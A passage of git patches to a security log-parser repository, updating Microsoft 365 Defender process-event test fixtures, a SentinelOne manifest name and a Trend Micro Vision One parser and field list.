action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation or json_event.message.properties.ProcessTokenElevation}}" + action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}" + action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}" action.properties.InitiatingProcessCommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}" action.properties.InitiatingProcessVersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}" action.properties.InitiatingProcessVersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}" From a4b94af6afa920ba08482254408c406c0ef90db6 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 28 Nov 2024 11:57:27 +0100 Subject: [PATCH 101/150] Correction of overwrited test file --- .../tests/test_device_process_events_2.json | 114 ++++++------------ 1 file changed, 36 insertions(+), 78 deletions(-) diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json index cab75fb0a..9b0327128 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json @@ -1,6 +1,6 @@ { "input": { - "message": "{\"time\":\"2024-11-08T14:39:36.1544409Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceProcessEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:39:21.6551859Z\",\"properties\":{\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessFileSize\":145408,\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"file.exe\",\"InitiatingProcessParentFileName\":\"file.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\file.exe\",\"InitiatingProcessCommandLine\":\"CommandExec.exe -Embedding ABCDEF0123456789 E Global\\\\HOST0000\",\"SHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"FileSize\":82944,\"MD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"FolderPath\":\"C:\\\\Windows\\\\processcommand.exe\",\"ProcessCommandLine\":\"\\\"processcommand.exe\\\" advfirewall firewall delete rule name=\\\"program=description= embedded HTTP server incoming traffic\\\"\",\"FileName\":\"processcommand.exe\",\"ProcessId\":4520,\"InitiatingProcessId\":10868,\"ProcessCreationTime\":\"2024-11-08T14:38:51.9030484Z\",\"DeviceName\":\"host.group.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:00.6744945Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessSignatureStatus\":\"Valid\",\"InitiatingProcessSignerType\":\"OsVendor\",\"InitiatingProcessParentId\":14840,\"ReportId\":17318,\"InitiatingProcessParentCreationTime\":\"2024-11-08T14:37:49.152209Z\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"InitiatingProcessIntegrityLevel\":\"System\",\"AccountDomain\":\"account domain\",\"AccountName\":\"syst\u00e8me\",\"ProcessTokenElevation\":\"TokenElevationTypeDefault\",\"ProcessIntegrityLevel\":\"System\",\"AccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"SHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"InitiatingProcessLogonId\":999,\"LogonId\":999,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AccountUpn\":null,\"AccountObjectId\":null,\"AdditionalFields\":\"{\\\"DesktopName\\\":\\\"Win\\\\\\\\Default\\\"}\",\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"file\",\"InitiatingProcessVersionInfoOriginalFileName\":\"file.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"ProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"ProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"ProcessVersionInfoProductVersion\":\"10.0.22621.1\",\"ProcessVersionInfoInternalFileName\":\"processcommand.exe\",\"ProcessVersionInfoOriginalFileName\":\"processcommand.exe\",\"ProcessVersionInfoFileDescription\":\"Network Command Shell\",\"InitiatingProcessSessionId\":0,\"CreatedProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"ActionType\":\"ProcessCreated\",\"Timestamp\":\"2024-11-08T14:38:51.9073727Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", + "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, \"AccountObjectId\": null, \"AdditionalFields\": \"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\":423627,\\\"ProcessPosixSessionId\\\":180264,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", "sekoiaio": { "intake": { "dialect": "Microsoft 365 Defender", @@ -9,7 +9,7 @@ } }, "expected": { - "message": "{\"time\":\"2024-11-08T14:39:36.1544409Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceProcessEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:39:21.6551859Z\",\"properties\":{\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessFileSize\":145408,\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"file.exe\",\"InitiatingProcessParentFileName\":\"file.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\file.exe\",\"InitiatingProcessCommandLine\":\"CommandExec.exe -Embedding ABCDEF0123456789 E Global\\\\HOST0000\",\"SHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"FileSize\":82944,\"MD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"FolderPath\":\"C:\\\\Windows\\\\processcommand.exe\",\"ProcessCommandLine\":\"\\\"processcommand.exe\\\" advfirewall firewall delete rule name=\\\"program=description= embedded HTTP server incoming traffic\\\"\",\"FileName\":\"processcommand.exe\",\"ProcessId\":4520,\"InitiatingProcessId\":10868,\"ProcessCreationTime\":\"2024-11-08T14:38:51.9030484Z\",\"DeviceName\":\"host.group.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:00.6744945Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessSignatureStatus\":\"Valid\",\"InitiatingProcessSignerType\":\"OsVendor\",\"InitiatingProcessParentId\":14840,\"ReportId\":17318,\"InitiatingProcessParentCreationTime\":\"2024-11-08T14:37:49.152209Z\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"InitiatingProcessIntegrityLevel\":\"System\",\"AccountDomain\":\"account domain\",\"AccountName\":\"syst\u00e8me\",\"ProcessTokenElevation\":\"TokenElevationTypeDefault\",\"ProcessIntegrityLevel\":\"System\",\"AccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"SHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"InitiatingProcessLogonId\":999,\"LogonId\":999,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AccountUpn\":null,\"AccountObjectId\":null,\"AdditionalFields\":\"{\\\"DesktopName\\\":\\\"Win\\\\\\\\Default\\\"}\",\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"file\",\"InitiatingProcessVersionInfoOriginalFileName\":\"file.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"ProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"ProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"ProcessVersionInfoProductVersion\":\"10.0.22621.1\",\"ProcessVersionInfoInternalFileName\":\"processcommand.exe\",\"ProcessVersionInfoOriginalFileName\":\"processcommand.exe\",\"ProcessVersionInfoFileDescription\":\"Network Command Shell\",\"InitiatingProcessSessionId\":0,\"CreatedProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"ActionType\":\"ProcessCreated\",\"Timestamp\":\"2024-11-08T14:38:51.9073727Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", + "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, \"AccountObjectId\": null, \"AdditionalFields\": \"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\":423627,\\\"ProcessPosixSessionId\\\":180264,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", "event": { "category": [ "process" @@ -19,115 +19,73 @@ "info" ] }, - "@timestamp": "2024-11-08T14:38:51.907372Z", + "@timestamp": "2024-10-22T15:09:44.594155Z", "action": { "properties": { - "AccountSid": "S-1-2-3", - "InitiatingProcessCommandLine": "CommandExec.exe -Embedding ABCDEF0123456789 E Global\\HOST0000", - "InitiatingProcessFileSize": 145408, - "InitiatingProcessIntegrityLevel": "System", - "InitiatingProcessLogonId": "999", - "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", - "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", - "InitiatingProcessVersionInfoFileDescription": "Windows\u00ae installer", - "InitiatingProcessVersionInfoInternalFileName": "file", - "InitiatingProcessVersionInfoOriginalFileName": "file.exe", - "InitiatingProcessVersionInfoProductName": "Windows Installer - Unicode", - "InitiatingProcessVersionInfoProductVersion": "5.0.22621.3880", - "LogonId": "999", - "ProcessIntegrityLevel": "System", - "ProcessTokenElevation": "TokenElevationTypeDefault", - "ProcessVersionInfoCompanyName": "Microsoft Corporation", - "ProcessVersionInfoFileDescription": "Network Command Shell", - "ProcessVersionInfoInternalFileName": "processcommand.exe", - "ProcessVersionInfoOriginalFileName": "processcommand.exe", - "ProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", - "ProcessVersionInfoProductVersion": "10.0.22621.1" + "InitiatingProcessLogonId": "0", + "LogonId": "0" }, "type": "ProcessCreated" }, "file": { - "directory": "C:\\Windows\\processcommand.exe", + "directory": "/usr/bin/ps", "hash": { - "md5": "51a9cac9c4e8da44ffd7502be17604ee", - "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", - "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" + "md5": "098f6bcd4621d373cade4e832627b4f6", + "sha1": "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3", + "sha256": "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08" }, - "name": "processcommand.exe", - "size": 82944 + "name": "ps", + "size": 144632 }, "host": { - "id": "123456789abcdef", - "name": "host.group.local" + "id": "86dd1cf45142e904cb2e99c2721fac3ca198c6ca", + "name": "computer.intranet.example" }, "microsoft": { "defender": { "report": { - "id": "17318" + "id": "67417" } } }, "process": { "args": [ - "HTTP", - "advfirewall", - "delete", - "embedded", - "firewall", - "incoming", - "name=\"program=description=", - "rule", - "server", - "traffic\"" + "--no-headers", + "-A", + "-o", + "comm,pid,pcpu,pmem,rss,etimes" ], - "command_line": "\"processcommand.exe\" advfirewall firewall delete rule name=\"program=description= embedded HTTP server incoming traffic\"", - "name": "processcommand.exe", + "command_line": "/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers", + "name": "ps", "parent": { - "args": [ - "-Embedding", - "ABCDEF0123456789", - "E", - "Global\\HOST0000" - ], "code_signature": { - "status": "Valid", - "subject_name": "OsVendor" + "status": "Unknown", + "subject_name": "Unknown" }, - "command_line": "CommandExec.exe -Embedding ABCDEF0123456789 E Global\\HOST0000", - "executable": "c:\\windows\\file.exe", - "hash": { - "md5": "51a9cac9c4e8da44ffd7502be17604ee", - "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", - "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" - }, - "name": "file.exe", - "pid": 10868, - "start": "2024-11-08T14:38:00.674494Z", + "pid": 423627, + "start": "2024-10-22T15:09:44.590000Z", "user": { - "domain": "account domain", - "id": "S-1-2-3", - "name": "syst\u00e8me" - }, - "working_directory": "c:\\windows" + "domain": "computer", + "name": "root" + } }, - "pid": 4520, - "start": "2024-11-08T14:38:51.903048Z", - "working_directory": "C:\\Windows" + "pid": 423627, + "start": "2024-10-22T15:09:44.594155Z", + "working_directory": "/usr/bin" }, "related": { "hash": [ - "44543e0c6f30415c670c1322e61ca68602d58708", - "51a9cac9c4e8da44ffd7502be17604ee", - "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323", - "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + "098f6bcd4621d373cade4e832627b4f6", + "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08", + "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3" ], "user": [ - "syst\u00e8me" + "root" ] }, "user": { - "domain": "account domain", - "name": "syst\u00e8me" + "domain": "computer", + "name": "root" } } } \ No newline at end of file From a284a656b8d0f342bbdb8a6e70cb8332adc31db6 Mon Sep 17 00:00:00 2001 From: vg-svitla <131353512+vg-svitla@users.noreply.github.com> Date: Thu, 28 Nov 2024 14:14:52 +0200 Subject: [PATCH 102/150] Update SentinelOne/identity/_meta/manifest.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Sébastien Quioc --- SentinelOne/identity/_meta/manifest.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/SentinelOne/identity/_meta/manifest.yml b/SentinelOne/identity/_meta/manifest.yml index 33be89396..1d18ad943 100644 --- a/SentinelOne/identity/_meta/manifest.yml +++ b/SentinelOne/identity/_meta/manifest.yml @@ -1,6 +1,6 @@ uuid: b502e522-6996-4b12-9538-f69326b68243 -name: identity -slug: identity +name: SentinelOne Singularity Identity +slug: sentinelone-singularity-identity description: >- SentinelOne Singularity Identity is a cybersecurity solution that provides identity protection and zero-trust security by continuously monitoring and analyzing user behaviors to detect and prevent potential threats. From db978530c9756d0b397b872be52be2cb07b45727 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Thu, 28 Nov 2024 14:58:43 +0200 Subject: [PATCH 103/150] Trend Micro Vision One - improve parser --- .../trend-micro-vision-one/_meta/fields.yml | 10 +++ .../trend-micro-vision-one/ingest/parser.yml | 54 +++++++------ .../tests/test_eicar_test_file_detection.json | 57 ++++++++++++++ .../tests/test_information_gathering.json | 76 +++++++++++++++++++ .../tests/test_internal_network_scanner.json | 1 + .../tests/test_process.json | 1 + .../tests/test_project_injection.json | 76 +++++++++++++++++++ .../tests/test_registry.json | 1 + .../tests/test_service_abuse.json | 74 ++++++++++++++++++ 9 files changed, 328 insertions(+), 22 deletions(-) create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_project_injection.json create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json diff --git a/Trend Micro/trend-micro-vision-one/_meta/fields.yml b/Trend Micro/trend-micro-vision-one/_meta/fields.yml index f18d3cb5d..2f93f2919 100644 --- a/Trend Micro/trend-micro-vision-one/_meta/fields.yml +++ b/Trend Micro/trend-micro-vision-one/_meta/fields.yml @@ -1,3 +1,8 @@ +action.properties.ScriptBlockText: + description: '' + name: action.properties.ScriptBlockText + type: keyword + trendmicro.vision_one.alert_id: description: '' name: trendmicro.vision_one.alert_id @@ -8,6 +13,11 @@ trendmicro.vision_one.case_id: name: trendmicro.vision_one.case_id type: keyword +trendmicro.vision_one.detection_name: + description: '' + name: trendmicro.vision_one.detection_name + type: keyword + trendmicro.vision_one.incident_id: description: '' name: trendmicro.vision_one.incident_id diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml index 09ca7f331..0353bb37b 100644 --- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml +++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml @@ -25,12 +25,13 @@ stages: - set: "@timestamp": "{{parsed_event.message.createdDateTime}}" - host.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.name }}" - host.ip: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.ips }}" + host.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'host') | first).entityValue.name }}" + host.ip: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'host') | first).entityValue.ips }}" + host.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'host') | first).entityValue.guid }}" - user.email: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'emailAddress') | first).entityValue }}" - container.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'container') | first).entityValue }}" - container.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'container') | first).entityId }}" + user.email: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'emailAddress') | first).entityValue }}" + container.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'container') | first).entityValue }}" + container.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'container') | first).entityId }}" rule.name: "{{parsed_event.message.model}}" rule.id: "{{parsed_event.message.model.modelId}}" @@ -38,7 +39,7 @@ stages: event.url: "{{parsed_event.message.model.workbenchLink}}" - set: 